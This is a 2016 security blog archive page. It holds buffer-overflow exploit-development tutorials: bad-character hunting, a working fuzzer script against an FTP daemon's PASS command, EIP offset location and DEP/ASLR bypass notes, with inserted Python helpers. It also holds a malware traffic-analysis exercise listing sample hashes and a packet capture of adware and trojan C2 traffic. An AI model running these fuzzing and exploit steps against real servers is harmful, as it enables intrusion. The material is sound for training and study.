Monthly Archives: August 2016

Writing Shellcode for Buffer Overflows – Avoiding Bad Characters

Depending on the application, the vulnerability type and the protocols in use, certain byte values are "bad": they must not appear anywhere in the buffer, the return address or the shellcode. The most common example, especially in overflows caused by unchecked string copy operations, is the null byte (0x00): the copy routine treats it as the end of the string, so everything after the first null is silently dropped and the buffer is truncated at that point. Another example, specific to the POP3 PASS command, is the carriage return (0x0D), which tells the server that the end of the password has been reached.

An experienced exploit writer checks for bad characters early, before chasing problems that turn out to be a mangled payload. An easy way to do this is to send every possible byte value, 0x00 through 0xFF, as part of the buffer, and then inspect how the application handled those bytes in memory once the crash has occurred.

Review the memory at ESP in the debugger after the crash and compare it byte for byte with what you sent: at the first 0x0A you will notice that everything after it has been truncated.

0x0A is the line feed, and it is bad here for the same reason the carriage return is: the daemon treats it as the end of the command. We remove \x0A from the list (and from the probe), resend the payload, and repeat the comparison until the whole probe survives in memory unchanged.
To summarize, for this target the buffer must not contain 0x00, 0x0A or 0x0D anywhere, and the same list is what you hand to the shellcode encoder (for example msfvenom's -b option) so the generated shellcode avoids them as well.
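The probe-and-compare loop described above, written out as an added Python example (this is not the post's code). The target is a constructed stand-in that behaves like the POP3 daemon just described; in the real workflow read_back is the memory you copy out of Immunity Debugger at ESP after each crash, and find_bad_char also catches bytes that were mangled rather than truncated.

```python
"""Bad-character hunt for an overflow payload (added example).

Builds the 0x00..0xff probe with the bytes already known to be bad left out,
compares what came back from memory with what was sent, and repeats until the
whole probe survives. simulated_pop3_target is a constructed stand-in for the
daemon; in practice read_back is the memory read at ESP in the debugger.
"""


def badchar_probe(exclude=()):
    """Every byte value 0x00..0xff in order, minus the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def find_bad_char(sent, observed):
    """First position where memory differs from the probe.

    Returns (index, sent_byte, observed_byte): observed_byte is None when the
    copy stopped before this byte (truncation, as with 0x00 and strcpy), or the
    byte that replaced it (mangling, e.g. a case change or 0x0a becoming 0x0d).
    Returns None when the whole probe arrived intact.
    """
    for i, b in enumerate(sent):
        if i >= len(observed):
            return (i, b, None)
        if observed[i] != b:
            return (i, b, observed[i])
    return None


def hunt_bad_chars(read_back, known=()):
    """Probe / compare / exclude loop; returns the bad bytes in the order found."""
    bad = list(known)
    for _ in range(256):                 # at most one new bad byte per round
        probe = badchar_probe(bad)
        hit = find_bad_char(probe, read_back(probe))
        if hit is None:
            return bad
        bad.append(hit[1])
    return bad


def simulated_pop3_target(buf):
    """Constructed stand-in for the vulnerable daemon, not real server code:
    the PASS parser stops at CR or LF and the strcpy() behind it stops at NUL."""
    for i, b in enumerate(buf):
        if b in (0x00, 0x0a, 0x0d):
            return buf[:i]
    return bytes(buf)


if __name__ == '__main__':
    bad = hunt_bad_chars(simulated_pop3_target)
    # This list is what goes to the encoder, e.g. msfvenom ... -b '\x00\x0a\x0d'
    print('bad chars:', ' '.join('\\x%02x' % b for b in bad))
```

Each round removes exactly one byte, so the loop runs once per bad character plus a final clean round; when a byte is mangled rather than dropped (observed_byte is not None) you still exclude the byte that was sent, since that is the value the application refuses to pass through.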


Fuzzing Programs to find Windows Buffer Overflows – Bypass ASLR & DEP – Controlling and Overwriting EIP

Modern Windows Buffer Overflows and Techniques

Most modern Windows applications are compiled with Data Execution Prevention (DEP) and/or Address Space Layout Randomization (ASLR) support, which makes exploitation considerably harder: these protections have to be bypassed before a classic stack overflow turns into code execution.

DEP, introduced in Windows XP SP2 and Windows Server 2003 SP1, is a set of hardware and software technologies that perform additional checks on memory to help prevent malicious code from running on a system. Its primary benefit is to prevent code execution from data pages (the stack and heap, where our buffer lives) by raising an exception when execution is attempted there, so shellcode placed in the buffer cannot simply be jumped to.

ASLR, introduced in Windows Vista, randomizes the base addresses of executables and DLLs. For DLLs the randomized base is chosen once per boot and shared by every process that loads them, so an address that worked on one run is unlikely to work after a reboot or on another machine. Only modules linked with /DYNAMICBASE take part, which is why exploit writers look for a loaded module built without it and take their return address (for example a JMP ESP instruction) from there.
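As an added example (not from the post), a small Python script that reads the DllCharacteristics word from a PE header, which is how you tell whether a given module opted in to DEP (/NXCOMPAT) and ASLR (/DYNAMICBASE) before picking a return address from it. The build_minimal_pe helper and the flag values passed to it are constructed test input, not a real binary; the header offsets and flag bits follow the PE format as Microsoft documents it.

```python
"""Read the DEP/ASLR opt-in flags from a PE header (added example)."""
import struct
import sys

# IMAGE_DLLCHARACTERISTICS_* bits from winnt.h
DLL_FLAGS = {
    0x0020: 'HIGH_ENTROPY_VA',   # 64-bit ASLR with high entropy
    0x0040: 'DYNAMIC_BASE',      # /DYNAMICBASE: image may be relocated by ASLR
    0x0100: 'NX_COMPAT',         # /NXCOMPAT: image declares itself DEP compatible
    0x0400: 'NO_SEH',            # image uses no structured exception handlers
    0x4000: 'GUARD_CF',          # Control Flow Guard
}


def pe_mitigations(data):
    """Return {flag_name: bool, ..., 'arch': 'PE32' | 'PE32+'} for the PE image in data."""
    if data[:2] != b'MZ':
        raise ValueError('no MZ header')
    e_lfanew = struct.unpack_from('<I', data, 0x3c)[0]
    if data[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        raise ValueError('no PE signature')
    # Optional header follows the 4-byte signature and the 20-byte COFF header.
    opt = e_lfanew + 24
    magic = struct.unpack_from('<H', data, opt)[0]
    if magic not in (0x10b, 0x20b):
        raise ValueError('unknown optional header magic 0x%x' % magic)
    # DllCharacteristics sits at offset 70 in both the PE32 and PE32+ optional header.
    chars = struct.unpack_from('<H', data, opt + 70)[0]
    result = {name: bool(chars & bit) for bit, name in DLL_FLAGS.items()}
    result['arch'] = 'PE32+' if magic == 0x20b else 'PE32'
    return result


def fixed_address_candidate(mitigations):
    """True when the module did not opt in to ASLR, so its addresses survive a reboot.

    Only the opt-in bit is checked; a system that forces mandatory ASLR, or runs
    DEP in AlwaysOn mode, overrides these bits, so confirm in the debugger too.
    """
    return not mitigations['DYNAMIC_BASE']


def build_minimal_pe(dll_characteristics, pe32plus=False):
    """Constructed test input: the smallest header layout pe_mitigations() needs."""
    e_lfanew = 0x40
    dos = b'MZ' + b'\0' * (0x3c - 2) + struct.pack('<I', e_lfanew)   # exactly 64 bytes
    size_opt = 240 if pe32plus else 224
    machine = 0x8664 if pe32plus else 0x14c
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack('<HHIIIHH', machine, 0, 0, 0, 0, size_opt, 0x2102)
    opt = bytearray(size_opt)
    struct.pack_into('<H', opt, 0, 0x20b if pe32plus else 0x10b)
    struct.pack_into('<H', opt, 70, dll_characteristics)
    return dos + b'PE\0\0' + coff + bytes(opt)


if __name__ == '__main__':
    # Usage: python pe_mitigations.py some.dll   (no argument: the constructed sample)
    blob = open(sys.argv[1], 'rb').read() if len(sys.argv) > 1 else build_minimal_pe(0x0140)
    m = pe_mitigations(blob)
    print(m, 'fixed-address candidate:', fixed_address_candidate(m))
```

Run it over every module the target process has loaded (Immunity's module list tells you which files those are) and the ones reporting DYNAMIC_BASE False are where a JMP ESP worth hard-coding will come from; a module that also lacks NX_COMPAT does not by itself disable DEP for the process, since that is decided by the process-wide DEP policy.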

To exploit a stack buffer overflow we have to take control of the Extended Instruction Pointer (EIP), the register that holds the address of the next instruction to execute. Suppose we are exploiting a vulnerability in serv-u FTPD that crashes when we send 3000 A's to the daemon, and that EIP ends up overwritten with 0x41414141, four bytes from our buffer of A's (the hex value of the letter A is \x41). Because EIP controls execution, overwriting it with a value of our choosing is the most important step.

We can use a simple Python script to connect to the FTP server and send increasingly long strings of A's in the PASS command until the daemon crashes:

#!/usr/bin/python
# Python 2 fuzzer: sends ever longer PASS arguments until the daemon stops answering.
import socket
import sys

# Create an array of buffers: 1 byte, then 100 to 5900 bytes in increments of 200.
buffer = ["A"]
counter = 100
while len(buffer) <= 30:
    buffer.append("A" * counter)
    counter = counter + 200

for string in buffer:
    print "Fuzzing PASS with %s bytes" % len(string)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect(('192.168.1.100', 21))
    except socket.error:
        # No answer: the previous buffer most likely crashed the daemon.
        print "Could not connect; check the debugger for a crash at the previous length"
        sys.exit(1)
    s.recv(1024)                      # banner
    s.send('USER anonymous\r\n')
    s.recv(1024)
    s.send('PASS ' + string + '\r\n')
    s.send('QUIT\r\n')
    s.close()

If we craft the exploit buffer carefully we can therefore divert execution to a location of our choosing, such as the part of the buffer where we place reverse shell code. We also need to pay close attention to the value of the Extended Stack Pointer (ESP) at crash time, since it frequently points straight into our buffer.

While fuzzing, attach Immunity Debugger to the daemon and watch EIP and ESP as each buffer is sent.

We know the program crashes and EIP is overwritten when we send 3000 A's, so we must locate the four A's in the buffer that land in EIP. There are a couple of ways of doing this; the first is:

Binary Tree Analysis
Instead of 3000 A's, we send 1500 A's followed by 1500 B's. If EIP is overwritten with B's (0x42424242), the four bytes lie in the second half of the buffer. We then replace the 1500 B's with 750 B's and 750 C's and send again; if EIP now holds C's, the four bytes lie in the 2250–3000 byte range. Keep splitting the half that EIP came from until the range is exactly four bytes wide. If EIP ever shows a mix of the two fill bytes, the four bytes straddle the split point, and the number of bytes from the first half tells you the offset directly. Because each round halves the candidate range, getting from 3000 bytes down to 4 takes about ten rounds (3000 / 2^10 ≈ 3).

Sending a Unique String
The faster method is to send a unique, non-repeating string of 3000 bytes, read the four bytes that overwrite EIP, and look up their position in that string. pattern_create.rb generates such a string and its companion pattern_offset.rb finds the position of a given value in it (either the four characters, or the EIP value as the debugger shows it); both ship with the Metasploit Framework's exploit development scripts.

root@computersecurity:~# find / -name pattern_create*
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
root@computersecurity:~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb 3000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A
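Both techniques above, as an added Python example that is neither the post's code nor Metasploit's: pattern_create builds the same Aa0Aa1Aa2... pattern as pattern_create.rb, pattern_offset does the lookup that pattern_offset.rb does (including reversing a little-endian EIP value), and bisect_offset automates the binary tree analysis. fake_crash is a constructed stand-in for the crashing daemon that returns the EIP value the debugger would show, and the offset 2003 it uses is hypothetical.

```python
"""Locate the four bytes that land in EIP (added example)."""
import string


def pattern_create(length):
    """Cyclic pattern in Metasploit's format: every aligned Upper/lower/digit triple is unique."""
    triples = (u + l + d for u in string.ascii_uppercase
               for l in string.ascii_lowercase
               for d in string.digits)         # 20280 bytes before it would repeat
    out = ''
    for t in triples:
        if len(out) >= length:
            break
        out += t
    return out[:length]


def pattern_offset(pattern, eip):
    """Offset in `pattern` of the bytes now in EIP, or -1.

    `eip` is either the value as the debugger shows it ('0x41336141'; x86 is
    little-endian, so the bytes are reversed before searching) or the four
    characters themselves ('Aa3A').
    """
    if eip.lower().startswith('0x'):
        needle = bytes.fromhex(eip[2:].rjust(8, '0'))[::-1].decode('ascii', 'replace')
    else:
        needle = eip
    return pattern.find(needle)


def bisect_offset(crash, total):
    """Binary tree analysis: fill the two halves of the candidate range with
    different bytes and see which one shows up in EIP. Returns (offset, rounds)."""
    lo, hi, rounds = 0, total, 0          # EIP's four bytes lie somewhere in [lo, hi)
    while hi - lo > 4:
        rounds += 1
        mid = (lo + hi) // 2
        buf = b'A' * lo + b'B' * (mid - lo) + b'C' * (hi - mid) + b'A' * (total - hi)
        raw = crash(buf).to_bytes(4, 'little')   # the bytes as they sit in memory
        if raw == b'BBBB':
            hi = mid
        elif raw == b'CCCC':
            lo = mid
        elif set(raw) <= {0x42, 0x43}:
            # Mixed B/C: the four bytes straddle mid, and the B count says where they start.
            return mid - raw.count(0x42), rounds
        else:
            raise ValueError('EIP is not controlled by this range: %r' % raw)
    return lo, rounds


def fake_crash(buf, offset=2003):
    """Constructed stand-in for the crashing daemon: EIP takes the four bytes at `offset`."""
    return int.from_bytes(buf[offset:offset + 4], 'little')


if __name__ == '__main__':
    pat = pattern_create(3000)
    eip = fake_crash(pat.encode())
    print('EIP = %#x -> offset %d' % (eip, pattern_offset(pat, hex(eip))))
    print('bisect -> offset %d in %d rounds' % bisect_offset(fake_crash, 3000))
```

With the hypothetical offset of 2003 the pattern lookup needs one crash, while the bisection needs ten rounds and only terminates early because the final split straddles the four bytes; that is the practical reason the unique-string method won.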



ANSWERS – Malware PCAP Traffic Analysis – Can you name the different types of malware? 2016-08-27

Here are the files that were executed to generate the traffic and pcap in the previous post:


Eorezo – sunnyday.exe

https://malwr.com/analysis/YzcxYTM0MzYxNGUyNDBjZjkyZjdlYzAyNzdkMTg5OWU/
https://virustotal.com/en/file/d1ae1454cca36dce4a687846ec394c542b13e829755c40653fbd495d95b02197/analysis/1472172878/

Farfli – netstream.exe

https://virustotal.com/en/file/969063116b1c717cd07015e04ecd6c2a6ad883da7dbcd2a4cd157100fa9c7b50/analysis/1472173093/

Citadel

https://virustotal.com/en/file/0765a0d3e6349761704d837f0d0a873a50a7e91a6efda972d1e82cf18df0ecbd/analysis/1472173251/

SHA256:     0765a0d3e6349761704d837f0d0a873a50a7e91a6efda972d1e82cf18df0ecbd
File name:     PROTESTO.exe
Detection ratio:     40 / 54
Analysis date:     2016-08-26 01:00:51 UTC

Banking Trojan CRDF.Trojan.Trojan-Spy.Banker.Citadel109468358

SHA256:     3903a5ba4a893621c272bde6bfc9407b8f4595e8965b907e22fe4a1ac9f7b535
File name:     us.exe
Detection ratio:     47 / 56
Analysis date:     2016-08-26 01:03:48 UTC

ZBOT / Banking Trojan

SHA256:     a32468ee49dad05def0fabc79b44b053490d8ff663ee95007d61bb47a7024bc7
File name:     inst1.exe
Detection ratio:     38 / 53

Papras / Password Stealer / Banking Trojan
SHA256:     ded40777eac5bfbb4c7a18108fee9023479ad94ebbe301dfaf31805d7612e8ae
File name:     inst3.exe
Detection ratio:     39 / 55
Analysis date:     2016-08-26 01:08:30 UTC

https://www.sophos.com/en-us/threat-center/threat-analyses/adware-and-puas/Eorezo/detailed-analysis.aspx


Malware PCAP Traffic Analysis – Can you name the different types of malware? 2016-08-27

Be careful: it is not all malware. Adware, PUPs and innocuous traffic are in play as well.

Download PCAP : netstream

VM executables used will be included in the next post.


2016-08-25 20:40:37.831293 IP 192.168.1.102.51776 > 37.187.148.135.80: Flags [P.], seq 0:267, ack 1, win 256, length 267: HTTP: GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1
E..3?…..~^…f%….@.P.._.p?..P…^…GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: prof.eorezo.com
Connection: Keep-Alive

2016-08-25 20:40:37.939899 IP 192.168.1.102.51776 > 37.187.148.135.80: Flags [.], ack 1279, win 251, length 0
E..(?……h…f%….@.P..`.p?  .P….”……..
2016-08-25 20:40:37.943675 IP 192.168.1.102.51776 > 37.187.148.135.80: Flags [F.], seq 267, ack 1279, win 251, length 0
E..(?……g…f%….@.P..`.p?  .P….!……..
2016-08-25 20:40:38.141806 IP 192.168.1.102.51777 > 151.80.21.143.80: Flags [S], seq 3409745412, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4?.@…K….f.P…A.P.<…….. ..O…………..
2016-08-25 20:40:38.233133 IP 192.168.1.102.51777 > 151.80.21.143.80: Flags [.], ack 1250113124, win 256, length 0
E..(?……….f.P…A.P.<..J.6dP….+……..
2016-08-25 20:40:38.237062 IP 192.168.1.102.51777 > 151.80.21.143.80: Flags [P.], seq 0:313, ack 1, win 256, length 313: HTTP: GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_INI HTTP/1.1
E..a?……….f.P…A.P.<..J.6dP…….GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_INI HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive

2016-08-25 20:40:47.118444 IP 192.168.1.102.51778 > 37.48.104.171.53: Flags [S], seq 1587645888, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4o.@…;/…f%0h..B.5^……… .HM…………..
2016-08-25 20:40:47.753813 IP 192.168.1.102.51778 > 37.48.104.171.53: Flags [S], seq 1587645888, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4o.@…;….f%0h..B.5^……… .HM…………..
2016-08-25 20:40:48.383911 IP 192.168.1.102.51778 > 37.48.104.171.53: Flags [S], seq 1587645888, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0o.@…;1…f%0h..B.5^…….p. .\\……….
2016-08-25 20:40:49.059816 IP 192.168.1.102.51779 > 37.48.104.171.53: Flags [S], seq 756890149, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4o.@…;,…f%0h..C.5-.:%…… ..k…………..
2016-08-25 20:40:49.338099 IP 192.168.1.102.12102 > 88.198.80.173.22638: UDP, length 50
E..Ne…..i8…fX.P./FXn.:.B(.(…e.8X….e…J…      ….e..?\./.;@w..K.-.JRh..]
2016-08-25 20:40:49.712951 IP 192.168.1.102.51779 > 37.48.104.171.53: Flags [S], seq 756890149, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4o.@…;+…f%0h..C.5-.:%…… ..k…………..
2016-08-25 20:40:50.332987 IP 192.168.1.102.51779 > 37.48.104.171.53: Flags [S], seq 756890149, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0o.@…;….f%0h..C.5-.:%….p. ..z……….
2016-08-25 20:40:50.919291 IP 192.168.1.102.51780 > 37.48.104.171.53: Flags [S], seq 3717442142, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4o.@…;)…f%0h..D.5…^…… ……………..
2016-08-25 20:40:50.931997 IP 192.168.1.102.63747 > 209.85.201.125.5222: Flags [.], ack 54, win 253, length 0
E..(}4….`….f.U.}…f.7 oN.g’P………….
2016-08-25 20:40:51.386024 IP 192.168.1.102.63735 > 108.168.236.116.80: Flags [.], ack 73, win 252, length 0
E..(n3…..q…fl..t…P..Cl.j.[P…t7……..
2016-08-25 20:40:51.547051 IP 192.168.1.102.51780 > 37.48.104.171.53: Flags [S], seq 3717442142, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4o.@…;(…f%0h..D.5…^…… ……………..
2016-08-25 20:40:52.183113 IP 192.168.1.102.51780 > 37.48.104.171.53: Flags [S], seq 3717442142, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0o.@…;+…f%0h..D.5…^….p. ………….
2016-08-25 20:40:52.338366 IP 192.168.1.102.12102 > 82.22.183.182.36659: UDP, length 52
E..P3…..:….fR…/F.3.<..yk.TE…rY….sq&..mg.b+…d.D.];=..
….o…9..9Q.”

2016-08-25 20:40:53.651836 IP 192.168.1.102.51782 > 37.187.148.135.80: Flags [P.], seq 0:663, ack 1, win 256, length 663: HTTP: POST /cgi-bin/get_protect.cgi HTTP/1.1
E…?…..|….f%….F.P…?~…P…….POST /cgi-bin/get_protect.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 564053523
x-spidermessenger-length: 280
Content-Type: text/*
User-Agent: sun21-SunnyDay21
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 386
Cache-Control: no-cache

ujXl2iaEv38JRlMCJUzLFCyglD0cQAQgE6EF56dWsz5OEBIEPEaaQ4ORDT3wc9vQbsZQLvQLyIGIKjW%2Fl4u3fdbbAMvHSB3Y8rHY6C15iy1v4T3HVwJHvnfvkcvsRH%2FwMwmTE0grv4DsJ%2ByvnMOf49J6q1ePUb8IejjsoHzBt3u6zWDwi57jEdnwDanJbVR9%2FQ6kiGKgMRlYm2VATvtoIK%2FXh1ewSC2acmrJpK8FPpDO5X4U8U%2BhVOQYKnve01SqePzC0jOBAaoCZYqrtet4eSNXBC58haWj9YO4CJ%2F4%2FM4Nav4noGSVy1Qbz81UE7k9%2BS0EqRjvZe%2FEFJL56ZEExcv7I8L7SqCbMzmWt19hp0A%3D
2016-08-25 20:40:53.755451 IP 192.168.1.102.51782 > 37.187.148.135.80: Flags [.], ack 2442, win 256, length 0
E..(?……a…f%….F.P….~..’P………….
2016-08-25 20:40:53.755850 IP 192.168.1.102.51782 > 37.187.148.135.80: Flags [.], ack 2443, win 256, length 0
E..(?……`…f%….F.P….~..(P………….
2016-08-25 20:40:53.936963 IP 192.168.1.102.51782 > 37.187.148.135.80: Flags [F.], seq 663, ack 2443, win 256, length 0
E..(? ….._…f%….F.P….~..(P………….
2016-08-25 20:40:54.169503 IP 192.168.1.102.51783 > 151.80.21.143.80: Flags [S], seq 2595205625, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4@.@…K….f.P…G.P………. ……………..
2016-08-25 20:40:54.267077 IP 192.168.1.102.51783 > 151.80.21.143.80: Flags [.], ack 1240556016, win 256, length 0
E..(@……….f.P…G.P….I.a.P…|………
2016-08-25 20:40:54.267608 IP 192.168.1.102.51783 > 151.80.21.143.80: Flags [P.], seq 0:313, ack 1, win 256, length 313: HTTP: GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1
E..a@……….f.P…G.P….I.a.P…….GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive

2016-08-25 20:40:54.325234 IP 192.168.1.102.51781 > 37.187.148.118.443: Flags [P.], seq 0:235, ack 1, win 256, length 235
E…S…..j….f%..v.E……..9.P………………W…,…|_M.]]………..>..J…..\…
.9.8………5……………
…     .3.2…..E.D…../…A……………….       ……………]………upd.adskyforever.com………
.4.2……………..   .
…………………………

2016-08-25 20:40:54.365617 IP 192.168.1.102.51783 > 151.80.21.143.80: Flags [F.], seq 313, ack 881, win 253, length 0
E..(@……….f.P…G.P…3I.e`P…x………
2016-08-25 20:40:54.366167 IP 192.168.1.102.51783 > 151.80.21.143.80: Flags [.], ack 882, win 253, length 0
E..(@……….f.P…G.P…4I.eaP…x………
2016-08-25 20:40:54.370115 IP 192.168.1.102.51784 > 151.80.21.143.80: Flags [S], seq 4015338610, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4@.@…K….f.P…H.P.U4r…… ……………..
2016-08-25 20:40:54.420141 IP 192.168.1.102.51781 > 37.187.148.118.443: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {1461:2718}], length 0
E..4S.@…*….f%..v.E……..9……1…..
..?o..DX
2016-08-25 20:40:54.420536 IP 192.168.1.102.51781 > 37.187.148.118.443: Flags [.], ack 2718, win 256, length 0
E..(S…..j….f%..v.E……..DXP………….
2016-08-25 20:40:54.439037 IP 192.168.1.102.51781 > 37.187.148.118.443: Flags [P.], seq 235:369, ack 2718, win 256, length 134
E…S…..jw…f%..v.E……..DXP….}……F…BA………..,………..$’..N…Q.|..’3…O…U|.C.Q.)…….i…………..0@.n………1.>)….:X.R……].OG.b9..M.7y.).`|
2016-08-25 20:40:54.463188 IP 192.168.1.102.51784 > 151.80.21.143.80: Flags [.], ack 2683766345, win 256, length 0
E..(@……….f.P…H.P.U4s…IP….D……..
2016-08-25 20:40:54.463647 IP 192.168.1.102.51784 > 151.80.21.143.80: Flags [P.], seq 0:313, ack 1, win 256, length 313: HTTP: GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_FIN HTTP/1.1
E..a@……….f.P…H.P.U4s…IP…….GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_FIN HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive

2016-08-25 20:40:58.905556 IP 192.168.1.102.51787 > 87.236.19.58.80: Flags [.], ack 2856380214, win 64240, length 0
E..(x5…..f…fW..:.K.P…..@.6P………….
2016-08-25 20:40:58.906135 IP 192.168.1.102.51787 > 87.236.19.58.80: Flags [P.], seq 0:341, ack 1, win 64240, length 341: HTTP: POST /file.php HTTP/1.1
E..}x6………fW..:.K.P…..@.6P….{..POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

Xi%.i….<_gDUB4…..E..I……D.&…X…….g]….2.}dz4.w.J.|5..<..ZqD.)o…..P,..o….|..b;..”f…P-..@…..2.X5.m…….-.”q..
2016-08-25 20:40:58.920785 IP 192.168.1.102.51788 > 87.236.19.58.80: Flags [.], ack 1603268971, win 64240, length 0
E..(x7…..d…fW..:.L.Pr…_..kP…h………
2016-08-25 20:40:58.921202 IP 192.168.1.102.51788 > 87.236.19.58.80: Flags [P.], seq 0:353, ack 1, win 64240, length 353: HTTP: POST /file.php HTTP/1.1
E…x8………fW..:.L.Pr…_..kP….$..POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

..m.*d…`.7E…f.}..Spr@…!o..A..i….J….I.yX.C…8..:….W.a…….?..2D.0#g]…].v..=7b…..WcAV…. JL..\.fUh…4M}zUv.Y..C….y…F
J.
2016-08-25 20:40:59.107685 IP 192.168.1.102.51787 > 87.236.19.58.80: Flags [P.], seq 341:694, ack 519, win 63722, length 353: HTTP: POST /file.php HTTP/1.1
E…x9………fW..:.K.P.. ..@.<P….+..POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

..m.*d…`.7E…f.}..Spr@…!o..A..i….J….I.yX.C…8..:….W.a…….?..2D.0#g]…].v..=7b…..WcAV…. JL..\.fUh…4M}zUv.Y..C….y…F
J.
2016-08-25 20:40:59.107907 IP 192.168.1.102.51788 > 87.236.19.58.80: Flags [P.], seq 353:694, ack 519, win 63722, length 341: HTTP: POST /file.php HTTP/1.1
E..}x:………fW..:.L.Pr…_..qP…N…POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

2016-08-25 20:41:35.942852 IP 192.168.1.102.51421 > 92.111.175.125.22222: Flags [F.], seq 3197274254, ack 152215858, win 252, length 0
E..(U……….f\o.}..V…..    ..2P………….
2016-08-25 20:41:36.293772 IP 192.168.1.102.51421 > 92.111.175.125.22222: Flags [F.], seq 0, ack 1, win 252, length 0
E..(U……….f\o.}..V…..    ..2P………….
2016-08-25 20:41:36.894824 IP 192.168.1.102.51421 > 92.111.175.125.22222: Flags [F.], seq 0, ack 1, win 252, length 0
E..(U……….f\o.}..V…..    ..2P………….
2016-08-25 20:41:37.360053 IP 192.168.1.102.12102 > 88.198.80.173.22638: UDP, length 62
E..Ze…..i*…fX.P./FXn.F…b._…80./[…………..0.=u”….T..obM..1…..   …k..#>.X.#
2016-08-25 20:41:38.095908 IP 192.168.1.102.51421 > 92.111.175.125.22222: Flags [F.], seq 0, ack 1, win 252, length 0
E..(U……….f\o.}..V…..    ..2P………….
2016-08-25 20:41:40.360218 IP 192.168.1.102.12102 > 82.22.183.182.36659: UDP, length 57
E..U3…..:….fR…/F.3.A.iI.+P….&c..O..#..u.:……….’..
.W.d…`p.4….m^n….
2016-08-25 20:41:40.497053 IP 192.168.1.102.51421 > 92.111.175.125.22222: Flags [F.], seq 0, ack 1, win 252, length 0
E..(U……….f\o.}..V…..    ..2P………….
2016-08-25 20:41:42.663567 IP 192.168.1.102.51790 > 23.253.126.58.443: Flags [S], seq 117805912, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@……..f..~:.N…..X…… ..c…………..
2016-08-25 20:41:43.360410 IP 192.168.1.102.12102 > 210.133.208.78.11652: UDP, length 54
E..Rq…..d….f…N/F-..>….3.y…”.-..)_*…..L…r2…..$
H.T……………yb
2016-08-25 20:41:45.297334 IP 192.168.1.102.51421 > 92.111.175.125.22222: Flags [F.], seq 0, ack 1, win 252, length 0
E..(U……….f\o.}..V…..    ..2P………….

2016-08-25 20:42:49.622060 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [S], seq 2057745320, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4O.@…!….f..
}.T..z……… ……………..
2016-08-25 20:42:49.794120 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [.], ack 3954064400, win 260, length 0
